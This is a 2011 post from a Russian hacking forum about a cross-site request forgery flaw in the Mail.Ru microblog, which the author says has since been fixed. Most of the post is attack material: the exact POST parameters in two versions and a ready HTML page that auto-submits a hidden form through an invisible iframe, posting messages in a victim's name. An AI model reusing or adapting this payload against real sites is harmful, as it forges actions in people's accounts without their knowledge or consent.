Stas'M Corp.
Главная | XSRF уязвимость в микроблоге (не актуально) - Форум | Регистрация | Вход
 
Среда, 18.09.2019, 06:02
Приветствую Вас Гость | RSS
| ENG | RUS
Форма входа

Информация о тебе:

IP-адрес: 35.171.146.16
Браузер: Неизвестен
Основные разделы
Мини-чат
Loading Загрузка сообщений...
Наш опрос
Что делаете на нашем сайте?
Всего ответов: 1111
[ Новые сообщения · Участники · Правила форума · Поиск · RSS ]
  • Страница 1 из 1
  • 1
Модератор форума: Administrator, Phantom, b@bskEnízm  
Форум » Хакерский форум » Mail.Ru » XSRF уязвимость в микроблоге (не актуально)
XSRF уязвимость в микроблоге (не актуально)
AdministratorДата: Понедельник, 30.05.2011, 17:26 | Сообщение # 1
Admin
Группа: Администраторы
Сообщений: 90
Награды: 39
Репутация: 50
Статус: Offline
XSRF уязвимость позволяет атакующему отправить в микроблог пользователя любое сообщение.
Создаётся специальный HTML файл с формой и с использованием JavaScript.

Образец запроса (старый вариант):

URL:http://my.mail.ru/cgi-bin/my/ajax
Метод:POST
Кодировка:UTF-8
Поля формы:
ajax_call1
func_namemicropost.send
data["Текст сообщения", ""]
mna0
mnb-1
_<пустое>

Образец запроса (новый вариант):

URL:http://my.mail.ru/cgi-bin/my/ajax
Метод:POST
Кодировка:UTF-8
Поля формы:
ajax_call1
func_namemicropost.send
data["Текст сообщения", {"type": "micropost"}]
mna0
mnb-1
_<пустое>

Образец HTML кода, использующего эту уязвимость:

Code
<form id="send_micropost" method="POST" action="http://my.mail.ru/cgi-bin/my/ajax" target="frame_micropost">
<input type="hidden" name="ajax_call" value="1">
<input type="hidden" name="func_name" value="micropost.send">
<input type="hidden" name="data" id="message_sending">
<input type="hidden" name="mna" value="0">
<input type="hidden" name="mnb" value="-1">
<input type="hidden" name="_" value="">
<input type="submit" value="Submit">
</form>
<script type="text/javascript">
document.getElementById('message_sending').value = "[\"Текст сообщения\", \"\"]";
document.getElementById('send_micropost').submit();
</script>
<iframe name="frame_micropost" width="0" height="0" scrolling="no" frameborder="0"></iframe>

К сожалению, эту уязвимость недавно исправили.


Stas'M
 
Форум » Хакерский форум » Mail.Ru » XSRF уязвимость в микроблоге (не актуально)
  • Страница 1 из 1
  • 1
Поиск:

Веб приложения
Пожертвование / Donate
WMWebMoney transferZ358077191062
WMWebMoney transferE208225402366
WMWebMoney transferP303537803958
WMWebMoney transferB345247247920
WUWestern Union transferuse feedback form
Друзья сайта

Просим вас посещать сайты наших друзей! Они достойны такого же внимания как и мы!

Пользователи

Пользователи онлайн:
Статистика

Copyright © Stas'M Corp. 2019Хостинг от uCoz